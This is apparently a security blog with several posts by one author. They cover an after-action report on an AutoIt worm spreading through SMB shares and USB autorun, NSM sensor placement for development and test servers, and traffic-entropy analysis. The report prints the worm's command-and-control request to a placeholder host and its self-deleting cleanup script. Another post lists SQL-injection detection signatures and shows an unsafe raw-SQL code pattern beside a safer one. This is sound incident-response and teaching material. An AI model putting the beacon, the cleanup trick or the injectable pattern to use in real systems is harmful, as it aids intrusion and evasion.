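One practical tip for the capture workstation: the exported copies arrive interleaved with the workstation’s own traffic, so it helps to filter the latter out at capture time. A simple (if slightly blunt) sketch, assuming the workstation’s own address is 192.0.2.99:

tshark -i eth0 -f 'not host 192.0.2.99' -w rite-export.pcap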

In the next exciting installment, the Cisco Kid will look at ways of extracting network session information from IOS routers, PIXes and ASAs.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Private Investigations

Posted in Case Studies, General Security, Malware, NSM, Why watch the wire? on 25 May, 2010 by Alec Waters

The following is a sanitised excerpt from an after action report on a malware infection. Like the song this post is named after, the report goes all the way from “It’s a mystery to me” to “What have you got to take away?”. The report is in two parts:

  • Firstly, a timeline of events that was constructed from the various forms of log and network flow data that are routinely collected. Although not explicitly cited in this report, evidence exists to back up all of the items in the timeline
  • The second part is an analysis of the cause of all the mischief

To set the scene, the mystery to be unraveled concerned two machines on an enterprise network which reported that they had detected and removed malware. Detected and removed? Case closed, surely? Never ones to let a malware detection go uninvestigated, we dig deeper…

Part One – Timeline of events

Unknown time, likely shortly before 08:12:37 BST
Ian Oswald attaches a USB stick to his computer. $AV_VENDOR does nothing, either because it detects no threat or because it isn’t working properly. The last message from $AV_VENDOR on Ian’s machine to $AV_MANAGEMENT_SERVER was on 30th January 2009, suggesting the latter is the case.

Based upon subsequent activity, malware is active on Ian’s machine at this point, and is running under his Windows account as a Domain Administrator. The potential for mischief is therefore largely unconstrained.

08:12:37 BST
Ian’s machine ($ATTACKER) requests the URL:

http://www.whatismyip.com/automation/n09230945.asp

This returns a page containing the outside global IP address of Ian’s machine (i.e., the IP address it will appear to have when communicating with hosts on the Internet).

Something on Ian’s machine now knows “where it is” on the Internet.

It is likely that the inside local IP address of Ian’s machine (192.168.1.11) is also determined at this point, so something on Ian’s machine also knows “where it is” within the enterprise.

08:12:39 BST
Ian’s machine requests the URL:

http://geoloc.daiguo.com/?self

This is a geolocation site, and returns a string containing a country code.

Something on Ian’s machine now knows “where it is” geographically.

08:12:56 BST
Ian’s machine attempts to download a hostile executable. This download is blocked by $URLFILTER, which is fortunate because at the time the executable was not detected as a threat by $AV_VENDOR.

NOTE – Subsequent analysis of the executable confirms its hostile nature; detailed discussion is out of the scope of this report, but a command and control channel was observed, and steganographic techniques were used to conceal the download of further malware by hiding an obfuscated executable in the Comments extension header of a gif file.

NOTE – It was not known until later in the investigation if Ian’s machine already knew where to download the executable from, or if a command and control channel was involved. Ian’s machine was running Skype at the time, which produces sufficient network noise to occlude such a channel when only network session information is available to the investigator.

After this attempted download, Ian’s machine starts trying to contact TCP ports 139 and 445 on IP addresses that are based on the determined outside global address of Ian’s machine (xxx.yyy.49.253).

TCP139 and TCP445 are used by the SMB protocol (Windows file sharing).

The scan starts with IP address xxx.yyy.49.1, and increments sequentially. As the day progresses, the scan of xxx.yyy.49.aaa finishes, and continues to scan xxx.yyy.50.aaa and xxx.yyy.51.aaa.

This is the behaviour of a worm. Something on Ian’s machine is trying to propagate to other machines nearby.

08:13:14 BST
Ian notices a process called ip.exe running in a command prompt window on his computer and he physically disconnects it from the network. This action was taken a very creditable 41 seconds after the first suspicious network activity.

Ian attempts to stop ip.exe running and remove it from his machine, and also deletes a file called gxcinr.exe from his USB stick.

08:24:51 BST
Ian reattaches his machine to the network.

08:25:36 BST
Ian uses Google to research ip.exe, and reads a blog posting which talks about its removal. Ian considers his machine clean at this point since the most obvious indicator (ip.exe) is no longer present.

08:57:32 BST
The external sequential SMB scanning observed before the attempted cleanup restarts at xxx.yyy.49.1.

Additionally, an internal scan commences at this point of the 192.168.1.aaa subnet (i.e., the enterprise’s internal network).

As the day progresses, the scan covers 192.168.2.aaa, 192.168.3.aaa, 192.168.4.aaa, 192.168.5.aaa, 192.168.6.aaa, 192.168.7.aaa and 192.168.8.aaa before Ian’s machine is switched off for the day. These latter subnets are not in use, so no connections were made to target systems.

The scan of 192.168.1.aaa is bound to bear fruit. Within this range, any detected SMB shares on enterprise computers will be accessed with the rights of a Domain Administrator.

8:58:43 BST
$AV_VENDOR detects and quarantines a threat named “W32/Autorun.worm.zf.gen” on $VICTIM_WORKSTATION_1 (Annie Timms’ machine). The threat was in a file called gxcinr.exe, which was in C:\Users\ on Annie’s machine. $AV_VENDOR cites $ATTACKER (Ian’s machine) as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:00:08 BST
$AV_VENDOR detects and quarantines the same threat in the same file in the same location on $VICTIM_WORKSTATION_2. Linda Charles was determined to be the logged on user at the time, and again Ian’s machine was cited as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:34:45 BST
$AV_VENDOR on $VICTIM_SERVER_1 detects the same threat in the same file, but in a different directory (C:\Program Files\Some software v1.1\). The threat was quarantined. No threat source was noted, although a successful type 3 (network) login from Ian.Oswald was noted immediately prior to the detection, making Ian’s machine the likely attacker. Unfortunately, the detection was _not_ propagated to $AV_MANAGEMENT_SERVER, and therefore did not find its way to the $SIEM to be sent as an email.

9:37:51 BST
The same threat was detected and quarantined on $VICTIM_SERVER_2, this time in E:\Testbeds\TestOne\. Again, a type 3 login from Ian.Oswald precedes the detection, which again was not propagated to $AV_MANAGEMENT_SERVER, $SIEM or email.

9:40:00 BST
The same threat appears on $VICTIM_SERVER_3, in C:\Program Files\SomeOtherSoftware. $AV_VENDOR does not detect the threat, because it isn’t fully installed on this machine.

NOTE – Detection of gxcinr.exe on this machine was by manual means, after the malware’s propagation mechanism was deduced (see next entry). $AV_VENDOR was subsequently installed on $VICTIM_SERVER_3 and a full scan performed. For what it’s worth, this did not detect any threats.

09:46:05 BST -> 09:54:44 BST
The border $IPS sensor detected Ian’s machine connecting to and enumerating SMB shares on three machines on $ISP’s network (i.e., other $ISP customers external to the enterprise).

This clue helps us see how the malware is spreading, and why the threats were detected in the cited directories.

The malware conducts a sequential scan of IP addresses, looking for open SMB ports. If it finds one, it enumerates the shares present, picks the first one only, and copies the threat (gxcinr.exe) to that location (i.e., \\VICTIMMACHINE\FirstShare\gxcinr.exe):

  • C:\Program Files\Some software v1.1\ equates to the first share on $VICTIM_SERVER_1 – \\$VICTIM_SERVER_1\Software
  • E:\Testbeds\TestOne\ equates to the first share on $VICTIM_SERVER_2 – \\$VICTIM_SERVER_2\TestOne
  • C:\Users equates to the first share on Annie’s and Linda’s machine – \\$VICTIM_WORKSTATION_1\Users and \\$VICTIM_WORKSTATION_2\Users
  • C:\Program Files\SomeOtherSoftware equates to the first share on $VICTIM_SERVER_3 – \\$VICTIM_SERVER_3\SomeOtherSoftware

This knowledge allows us to manually check other machines on the enterprise network by performing the same steps as the malware. Other machines and devices were found to have open file shares, but either the shares were not writeable from a Domain Administrator’s account, or there was no trace of the threat (gxcinr.exe).
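For the record, the manual check needed nothing fancier than the worm’s own steps; something like this, with HOST standing in for each machine checked and FirstShare for whichever share is listed first:

net view \\HOST
dir \\HOST\FirstShare\gxcinr.exe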

Circa 14:00 BST
Ian turns his machine off and leaves the office until the following Monday.

The following Monday
Ian returns to the office and wipes his machine, installing Windows 7 in place of the previous Windows Vista. “Patient Zero” is therefore gone forever, and any understanding we could have extracted from it is lost.

END OF TIMELINE

Part Two – Analysis of gxcinr.exe

It is necessary to understand what this file is, what it does, and how it persists in order to know if we have eradicated the threat. We also need to understand if gxcinr.exe was responsible for the propagation from Ian’s machine, or if it was just the payload.

Samples of gxcinr.exe were available in five places, namely the unprotected $VICTIM_SERVER_3 server and in the quarantine folders of the four machines where $AV_VENDOR detected the threat. We reverse-engineered the quarantine file format used by $AV_VENDOR and extracted the quarantined threats for comparison.

On the $VICTIM_SERVER_3 machine, the MAC times for gxcinr.exe were as follows:

Modified: aa/bb/2009 09:13
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
No file attributes were set.

Additionally, a zero-byte file called khw was found alongside gxcinr.exe. Its MAC times correlate with those of gxcinr.exe, indicating that it was either propagated along with gxcinr.exe or created by it:

Modified: xx/yy/2010 09:40
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
Attributes: RHSA

khw was also found on Linda Charles’s machine, and removed manually. No other machines had khw on them.

All five samples of gxcinr.exe were found to be identical:

File size: 808164 bytes

Hashes:
MD5 : 2511bcae3bf729d2417635cb384e3c08
SHA1 : 45fe02e4489110723c2787f3975ae7122b905400
SHA256: b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3

VirusTotal report is here:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1272966302

The AV detection rate is pretty good, although we were the first people to submit this specific malware sample to VirusTotal for analysis (i.e., it’s a reasonably fresh variant of a malware strain).

Whilst it’s not a safe assumption to judge the nature of malware by AV vendors’ descriptions alone, most of the descriptions have AutoIt in their names. AutoIt is a scripting tool that can be used to produce executables to carry out Windows tasks. Analysis of ASCII and Unicode strings contained in the sample lends weight to this theory.

AutoIt has an executable-to-script feature, but this was unable to extract the compiled script. Research suggests that this feature has been removed from recent versions of the software as a security precaution.

The sample contains the string below, amongst many other intelligible artefacts:

“This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.”

The address above was emailed asking for help, but no response was received.

The next step was to carry out dynamic analysis of the sample (i.e., the executable was run in an instrumented and controlled environment and the results observed).

When run, gxcinr.exe did very little. There was no geolocation, no IP address determination, no instance of ip.exe, no scanning, and no second-stage download.

However, three temporary files were discovered which gxcinr.exe created and later attempted to remove:

  1. aut1F.tmp (random filename, judging by repeated runs) is binary; the first four bytes are the ASCII string EA06 (http://www.virustotal.com/analisis/b3508b5a86ca4b9d972ce46dd4dcc1dcbe528a24190d2ed10a3cfcf8038c8ecd-1273577387). There is no obvious decode or deobfuscation.
  2. jbmphni (random filename, judging by repeated runs) is ASCII and starts off “3939i33t33i33t3135i33t…..”. There are many repeating patterns in the file, some of which are several tens of characters long (http://www.virustotal.com/analisis/0ad63912039550b5bdfd8a08ce5f49997ed1fced070df4d8e51cbffa500f102d-1273577394). Again, there is no obvious decode or deobfuscation.
  3. s.cmd is a cleanup script, run by gxcinr.exe after it itself has deleted the files above:

    :loop
    del "C:\gxcinr.exe"
    if exist "C:\gxcinr.exe" goto loop
    del c:\s.cmd

Running the sample in this manner yielded no obvious activity, infection, propagation or persistence.

However, if the file khw is present in the same directory as gxcinr.exe, different behaviour is observed. The three files above are extracted, the cleanup above is observed, but also:

  • A slightly modified version of the sample is copied to c:\windows\system32 as csrcs.exe. The name of the file is a deliberate attempt to hide in plain sight – there is a legitimate windows file called csrss.exe. Additionally, the file’s create and modified times are artificially set to match the date that Windows was installed. VirusTotal says this of csrcs.exe:
    http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274359325
  • No attempt is made to hide csrcs.exe from detection, nor does it delete its prefetch file. No matching prefetch files were found on the machines belonging to Annie and Linda, so it is unlikely that the malware executed there. Prefetch is disabled by default on Windows Server 2003, so this kind of analysis cannot be performed on $VICTIM_SERVER_1, $VICTIM_SERVER_2, and $VICTIM_SERVER_3.
  • csrcs.exe is set to auto-run with each reboot by means of various registry keys.
  • csrcs.exe contacts a command and control server at IP address qqq.www.eee.rrr on varying ports in the 81-89 range. The request was HTTP, and looked like this:

    GET /xny.htm HTTP/1.1
    Host: www.hostile.com:85
    Cache-Control: no-cache

    The response is encoded somehow:

    HTTP/1.1 200 Ok
    Content-Length: 2811
    Last-modified: xxx, xx xxx 2010 11:13:30 GMT
    Content-Type: text/html
    Connection: Keep-Alive
    Server: SHS

    <zZ45sAsM8Y77V69S888S6 … snip … 80ew0kty0j4tyj004>

    There is no obvious decode of the response, but we are likely receiving instructions of some kind. Looking retrospectively at the evidence secured at the time, we can see Ian’s machine contacting this IP address:

    08:12:39.048 BST: %IPNAT-6-CREATED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    08:12:41 BST Cisco Netflow : bytes: 289 , packets: 5 , 192.168.1.11 /50345 -> qqq.www.eee.rrr /85 TCP

    08:13:39.393 BST: %IPNAT-6-DELETED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    This C&C channel was not readily obvious due to the presence of Skype on Ian’s machine – there were too many other connections to random IP addresses on random ports for this to stand out.

    Despite the fact this suspected C&C channel uses unencrypted HTTP, only nominated ports are inspected via $URLFILTER (port 80 is inspected as the default, plus other ports where we have seen HTTP running in the past). At the time, 85 was not one of the nominated ports so no inspection of this traffic was carried out. Had port 85 been in the list, $URLFILTER would have blocked the request, as the destination is categorised as Malicious. It is unknown if this step would have prevented the worm from spreading, but it would have at least been another definite indicator of malice.

  • csrcs.exe then gets its external IP address and geolocation in the manner observed from Ian’s machine
  • csrcs.exe then starts scanning in the manner observed from Ian’s machine
  • csrcs.exe infects other machines in the manner observed from Ian’s machine

In our tests, csrcs.exe created a file on each remote victim machine called owadzw.exe, and put the file khw alongside it (suggesting that gxcinr.exe is a randomly generated filename). We did not observe any attempt to execute owadzw.exe, nor were any registry keys modified. The malware appears to spread, but seems to rely on manual execution when the remote file share is on a fixed disk.

However, if the file share that is accessed is removable media (USB stick, camera, MP3 player or whatever), an autorun.inf file is created that will execute the malware when the stick is inserted in another computer. It is likely therefore that Ian’s USB stick was infected in this manner, and the malware was unleashed on the enterprise by virtue of him plugging it in.

The VirusTotal result for owadzw.exe is similar to the results for gxcinr.exe and csrcs.exe, so they are all likely to be slight variations of one another:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274356524

We did not observe csrcs.exe trying to download any other executables, as was the case with Ian’s machine, nor did we observe ip.exe running on an infected machine.

Aside from spreading, the purpose of the malware is unknown. However, it is persistent (i.e., it will run every time you start your machine) and it does appear to have a command and control facility. It is entirely possible that at some later date it will ask for instructions and be told to carry out some other kind of activity (spamming, DOS, etc.) or it may download additional components (keyloggers, for example).

Where do we stand?

We understand the malware’s behaviour, and know how to look for indicators of it running both in terms of network activity and residual traces on the infected host. At present there are none, so we appear to be clean.

What went right?

  • An incident was triggered by virtue of an explicit indicator of malice (the $AV_VENDOR alerts from Annie’s and Linda’s machines).
  • Where functioning properly, $AV_VENDOR prevented the spread of the malware.
  • $URLFILTER blocked a malicious download.
  • We were able to preserve and analyse sufficient evidence in total absence of Patient Zero (Ian’s machine) for us to understand how the malware spreads. This let us carry out a comprehensive search for any other, undetected, infections (like the one on $VICTIM_SERVER_3).
  • We were able to recover a sample of the malware and analyse it to the extent that we can say with a good degree of confidence that it was present on Ian’s USB stick, and was responsible for the whole incident (as opposed to merely being the payload for some other unknown malware that had been running on Ian’s machine for an unknown period of time).
  • We were able to sharpen our detection of the malware, now that we know how it behaves.

What went wrong?

  • The infection was not stopped at its point of entry (Ian’s machine), most likely because $AV_VENDOR wasn’t working properly.
  • The malware executed as a Domain Administrator, effectively unlimiting the damage it could have caused.
  • The malware spread outside of the enterprise and infected other machines.
  • The malware infected an enterprise machine unprotected by $AV_VENDOR.
  • $VICTIM_SERVER_1 and $VICTIM_SERVER_2 did not report their infection to $AV_MANAGEMENT_SERVER. These detections were only discovered as part of the evidence preservation process.
  • $URLFILTER did not block the C&C channel due to the way it was configured.
  • The $IPS didn’t fire any “scanner” signatures.
  • No statistical alarms were raised by the $SIEM.

What can be changed or done better?

  • A review of the state of the $AV_VENDOR deployment should be carried out. We need to know what the coverage is like, how well the updates are working, and why certain machines don’t report to $AV_MANAGEMENT_SERVER.
  • Some form of USB device control should be implemented.
  • People with Administrative rights on the enterprise network should have two accounts, one “Admin” account and one “Normal” account. The Normal account should be used day-to-day, with the Admin account used only where necessary. This would put a cap on the capability of any malware that is able to run.
  • Unnecessary fileshares should be removed. It was determined experimentally that if you share anything within any user profile on a Vista or Win7 machine, the entire c:\users\ directory gets shared. This was the case on Annie’s and Linda’s machines.
  • The presence of Skype doesn’t help when dealing with an incident like this.
  • If a tighter outbound port filtering policy was applied, then the command and control channel would have been blocked, as would the worm’s attempts to propagate outside of the enterprise.

END OF REPORT

The production of this report would not have been possible without the routine collection of evidence from everything-you-can-lay-your-hands-on – servers, routers, switches, AV servers, URL filters and IPS devices all contributed to the report (notable things that did not contribute to the report are Ian’s machine and his USB stick, since they were wiped before they could play a part).

Without these event sources, all we’d have had were two reports of removed malware. Hardly cause for alarm, surely….


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Rear echelon NSM

Posted in General Security, NSM on 20 April, 2010 by Alec Waters

When it comes to any kind of traffic analysis device, proper placement is of critical importance – if it’s in the wrong place on the network, it won’t be able to see what you hope it will, and you’ll be blind to any badness that it could potentially detect.

If you work for the kind of company that develops (and subsequently hosts or supports) interactive web applications for clients, having a sensor keep watch over your Internet-facing production servers is probably a good idea. However, how did all of your clients’ web application goodness get onto a production server in the first place? With a bit of luck, each application started its life on some kind of private development server, after which it moved onto a public user acceptance testing (UAT) server for the client to take a look at. Only after client sign-off would it have moved to the production server.

I think that it’s a good idea to place sensors to watch over the seemingly less-important development and UAT servers, too. Let’s take each in turn:

Development Servers

Dev boxes are usually well within an organisation’s perimeter, behind firewalls and the like. Why would anyone try to take hostile action against a dev server? Surely if an attacker was even in a position to do so, you’d have far greater problems than attacks on the dev server – you’d have an attacker roaming at will within the castle walls. So what’s the point?

Well, here’s an example. Let’s say your sensor is loaded up with a whole bunch of signatures that attempt to detect various classes of web attack (SQL Injection, XSS, etc.), and you’ve got developers who just love technologies like AJAX and JSON. It’s terribly useful to have an AJAX request return some JSON-formatted data, a bit like the example here (it seems to work OK in IE and Firefox). Type the letter A into the first textbox, and an AJAX request is made to the server, which returns a JSON-formatted resultset of people whose names begin with A (fire up Wireshark and take a look at the requests for /specials/ajax_autosuggest/test.php). This resultset can then be parsed by the browser, and the data processed in whatever manner is necessary. Powerful stuff!

There’s nothing wrong with the example on the page above, but AJAX can go pear-shaped if a developer is tempted to embed raw SQL sentences into the request (or even partial sentences like ‘where’ clauses). AJAX requests are under-the-bonnet affairs that don’t appear in the browser’s Location bar, so it’s easy to think that they are out of sight and out of mind, when they can often be run directly and outside of their intended context. Any attacker worth their salt will discover and leverage a vulnerable AJAX page, and if there’s raw SQL in it, it’s bad news for the application concerned – you’re offering them the chance to execute arbitrary SQL against your server.
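To make the point concrete, here’s a hypothetical autosuggest endpoint sketched in Python/Flask (the route, database, table and column names are all made up for illustration), showing the dangerous pattern alongside the safer, parameterised one:

# Hypothetical autosuggest endpoint - illustrative only.
import sqlite3
from flask import Flask, jsonify, request

app = Flask(__name__)

@app.route("/ajax_autosuggest")
def autosuggest():
    prefix = request.args.get("prefix", "")

    # DANGEROUS: accepting a raw SQL fragment (or building one by string
    # concatenation) hands arbitrary SQL to anyone calling the URL directly:
    #   where = request.args.get("where")              # e.g. "name like 'A%'"
    #   cur = con.execute("select name from people where " + where)

    # Safer: a fixed statement with a bound parameter.
    con = sqlite3.connect("people.db")
    cur = con.execute(
        "select name from people where name like ? order by name limit 10",
        (prefix + "%",),
    )
    return jsonify(names=[row[0] for row in cur.fetchall()])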

So how can NSM help? With a bit of luck, our sensor has signatures like the ones below that stand a chance of picking up raw SQL elements in AJAX requests:

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql insert injection attempt - GET parameter"; flow:established,to_server; uricontent:"insert"; nocase; pcre:"/insert\s+into\s+[^\/\\]+/Ui"; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13513; rev:5;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql exec injection attempt - GET parameter"; flow:established,to_server; uricontent:"exec"; nocase; pcre:"/exec\s+master/Ui"; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13512; rev:5;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL generic sql update injection attempt - GET parameter"; flow:established,to_server; uricontent:"update"; nocase; pcre:"/update\s+[^\/\\]+set\s+[^\/\\]+/Ui"; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13514; rev:7;)

etc…

If signatures like these start firing whilst a new application is under development (and not under attack), it’s time to talk to the developers. Better to nip a vulnerability like this in the bud pre-deployment than to rush out an emergency hotfix post-breach. Even if the SQL isn’t exploitable (can you prove it?), you’re still giving too much away in the form of table and column names.

As an added bonus, an NSM sensor with full-packet capture capability can be used as a handy debugging aid when an obscure browser doesn’t work as expected – there ain’t no substitute for the actual HTTP transaction at times like these!

UAT Servers

These boxes are often sitting on the Internet proper so that the client can come along and review and test pre-release versions of the application. By definition, these are test servers, and may therefore have bugs and vulnerabilities that will hopefully be ironed out during the testing cycle; error reporting may also be turned up to the most verbose level to help the process. There may also be other code present for other projects, or experimental code left by someone wanting to test a theory, or all manner of other flotsam and jetsam.

All of this is advantageous to an attacker, and may eventually allow them access to the server. UAT boxes sometimes need to have “real” customer data on them for realistic testing, which makes them just as high-value a target as the production box. What if the UAT server is also a staging area for deployment? What if an attacker could add their own backdoor code into the staging area, ready for deployment later on?

Dismissing the need to monitor development and UAT servers because “they’re not live machines” sounds like a recipe for trouble to me. You need to protect your assets at all stages of their lifecycle, from the initial brainstorming to the great fdisk in the sky!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

(Mis)reading the runes

Posted in General Security, NSM on 16 February, 2010 by Alec Waters

Richard’s post over here talks about the “Intruder’s Dilemma”:

The defender only needs to detect one of the indicators of the intruder’s presence in order to initiate incident response within the enterprise.

I agree wholeheartedly. However, the wonderful thing about Indicators is that there can be lots and lots of them, and interpreting them can be tricky. Sometimes it’s easy to misinterpret what they’re telling you, and sometimes it’s tempting to focus 100% on the first or most prominent Indicator observed, ignoring (or not looking for) other ones that will add context and detail to the overall situation.

Take for example the Indicator in the picture below. What are we looking at?

  1. An enclosure at a wildlife park, or
  2. Some kind of strip club?

I was pretty disappointed when I went in, because:

  • For some reason, I had chosen to focus on my first interpretation of the Indicator, and
  • I had failed to take into account any unfavourable counter-Indicators that contradicted my assessment (the most prominent of which was being at a zoo at the time)

A while back, we had a problem with one of our systems – ProcessA wasn’t able to talk to ProcessB (the “security” slant here is that we’re dealing with a compromise of the “availability” facet of the CIA Triad). The system wasn’t working, and ProcessA had left loads of Indicators in the form of log entries which said “I tried to talk to ProcessB on port 1234 but I couldn’t”. ProcessA was clearly working at this point (otherwise there would have been no log entries), so the initial interpretation of the Indicator was that ProcessB was in some way at fault.

Cue the usual troubleshooting process:

  • Is ProcessB running? Yes.
  • Is ProcessB accepting requests right now? Yes, it seems to be working. The error messages from ProcessA are intermittent.
  • Was ProcessB running at the time ProcessA logged the messages? Yes. ProcessB logs startup/shutdown messages, and there aren’t any for this particular timeframe.
  • Was there some kind of network problem? Unlikely, since ProcessA and ProcessB are running on the same server.
  • Are you sure it wasn’t the network? Given the above, the network really can’t have much of a hand in this!
  • But ProcessB listens on IP address 1.2.3.4, which is bound to a physical interface. If that interface went down, wouldn’t ProcessB’s ability to listen be affected? Yes, but logs from the switch that the server connects to don’t show any up/down events for the interface concerned.

And so it went on, for several hours. ProcessB was deemed to be at fault, yet we couldn’t find anything wrong with it. The troubleshooting had become bogged down because:

  1. We were proceeding under the assumption that ProcessB was broken (I mean, duh!! ProcessA wouldn’t have left all those log messages if ProcessB were working, would it?!?)
  2. We were ignoring a gigantic counter-Indicator, namely “there’s nothing wrong with ProcessB”.

It generally takes two to tango, something that applies as much to TCP comms as anything else. If the server’s not at fault, perhaps it’s the client, ProcessA?

As it turns out, ProcessA was indeed the one with the problem. An errant service, ProcessZ, had been leaving thousands of sockets in the CLOSE_WAIT state (this almost always indicates a problem with the software, rather than an expected TCP phenomenon). Eventually it got to the point where the tango-ing ProcessA needed a client socket to talk to ProcessB, but there weren’t any ephemeral ports available because ProcessZ had, over time, left them all in CLOSE_WAIT (Windows Server 2003 only allows for 5000 ephemeral ports by default). Lacking a client socket with which to talk to ProcessB, ProcessA duly logged a message saying “I tried to talk to ProcessB on port 1234 but I couldn’t”…

Restarting ProcessZ was a temporary band-aid – all the sockets in CLOSE_WAIT went away, and ProcessA danced the night away with ProcessB.
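With hindsight, this particular counter-Indicator is easy to hunt for. Here’s a minimal sketch (my own illustration, not part of the original troubleshooting; it relies on the third-party psutil module and usually needs admin rights to see other processes’ sockets) that counts CLOSE_WAIT sockets per process, which would have pointed the finger at ProcessZ long before the ephemeral port pool ran dry:

from collections import Counter
import psutil

counts = Counter()
for conn in psutil.net_connections(kind="tcp"):
    if conn.status == psutil.CONN_CLOSE_WAIT:
        counts[conn.pid] += 1

# Show the worst offenders
for pid, n in counts.most_common(10):
    name = psutil.Process(pid).name() if pid else "unknown"
    print(f"{name} (pid {pid}): {n} sockets in CLOSE_WAIT")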

The moral of the story? Don’t take isolated Indicators at face value. There will almost always be other Indicators that either back up or refute your assessment – all you have to do is look for them.

The other moral of the story? Very few zoos have strip clubs 🙂


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Making sense of the results of the net-entropy experiment

Posted in Crazy Plans, net-entropy, NSM on 19 January, 2010 by Alec Waters

The rest of the net-entropy saga is listed here, but to briefly recap, net-entropy is a tool that can be used to profile the level of “randomness” of network traffic. High entropy traffic like this is usually either encrypted or compressed in nature, and I’m definitely interested in knowing about the presence of the former on my network. I’ve been using net-entropy as a general purpose “randomness detector”, something that the author didn’t really have in mind when he wrote it.
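For anyone unfamiliar with the idea, “entropy” here is essentially Shannon entropy measured over the bytes of a stream. The sketch below is my own illustration of what a high score means (net-entropy’s own estimators work incrementally on live traffic and differ in detail, but the idea is the same):

import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0 = constant, 8 = uniformly random."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())

# Plain text sits well below the maximum; compressed or encrypted
# payloads tend towards 8 bits per byte.
print(shannon_entropy(b"AAAAAAAA"))            # 0.0
print(shannon_entropy(bytes(range(256)) * 4))  # 8.0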

However, drawing meaningful conclusions from the results gathered can be tricky (this is nothing to do with net-entropy itself, and everything to do with the way I’m using it backwards to generically detect randomness). Some of the observed high entropy traffic will definitely fall into the “encrypted” category, like SSH and Remote Desktop. Other stuff will definitely be of the “compressed” flavour, like RTMP on port 1935.

Once this kind of low-hanging fruit has been pruned, the analyst is left with a whole load of unknown high-entropy traffic. If net-entropy’s presence is to be of any value at all when deployed this way, we have to try to make sense of the residual data in some way or another.

One tactic is to fire up Sguil and use its full-content capture to extract and examine each of the unknown high-entropy streams in turn. This is massively labour-intensive, but some of the time you’ll find something interesting like HTTPS on a non-standard port (the certificate exchange at the start of the conversation is in clear text, giving you a clue). Most of the time, however, you’re left looking at unintelligible garbage. Unsurprising really, given that it’s likely to be either compressed or encrypted…
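That clear-text handshake makes a handy shortcut when eyeballing an unknown stream. A minimal sketch of the check (my own illustration, nothing to do with net-entropy itself): a TLS or SSLv3 session opens with a handshake record, i.e. a content-type byte of 0x16 followed by a 0x03,0x0x protocol version.

def looks_like_tls_handshake(first_bytes: bytes) -> bool:
    """Heuristic: TLS/SSLv3 streams open with a handshake record -
    content type 0x16 followed by a 0x03,0x0x protocol version."""
    return (
        len(first_bytes) >= 3
        and first_bytes[0] == 0x16
        and first_bytes[1] == 0x03
        and first_bytes[2] <= 0x04
    )

# First few bytes of streams extracted from a full-content capture (hypothetical):
print(looks_like_tls_handshake(bytes([0x16, 0x03, 0x01, 0x02, 0x00])))  # True
print(looks_like_tls_handshake(b"220 ftp.example.com ready"))           # False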

Given that protocols like SSH, RDP and RTMP can usually be identified by their port numbers alone, and that what’s left is unreadable junk, how are we to derive value from the rest of net-entropy’s indicators? I can think of a couple of ways:

  • Session contextualisation
  • Session profiling on the basis of session duration and frequency, etc

Putting a high-entropy session into context isn’t too labour intensive, and sometimes pays dividends. Let’s say net-entropy has spotted a session from 1.2.3.4:25333 to 4.3.2.1:3377; the full-content capture is unreadable garbage, and the port numbers offer no clues. If we ask the question “was there any other traffic involving 1.2.3.4 and 4.3.2.1 at the same time”, we might get a hint. In this instance, there was a connection from 1.2.3.4:16060 to 4.3.2.1:21, which looks like an FTP command session judging by the port number. When we examine the full-content capture for this session, we can see passive FTP at work:

227 Entering Passive Mode (4,3,2,1,13,49).

The last two numbers denote the port that the client should connect to to transfer a file. Doing the maths, we see that (13 * 256) + 49 = 3377, so we can be pretty confident that our high-entropy traffic in this case was a file transferred over FTP.
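That arithmetic is easy enough in your head, but if you’re checking a lot of sessions a tiny helper saves time. A minimal sketch (my own, purely illustrative):

import re

def passive_ftp_port(response):
    """Extract the data port from a '227 Entering Passive Mode' reply."""
    m = re.search(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)", response)
    if not m:
        return None
    return int(m.group(5)) * 256 + int(m.group(6))

print(passive_ftp_port("227 Entering Passive Mode (4,3,2,1,13,49)."))  # 3377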

If context can’t be established however, all is not lost – we can look at other attributes of the traffic.

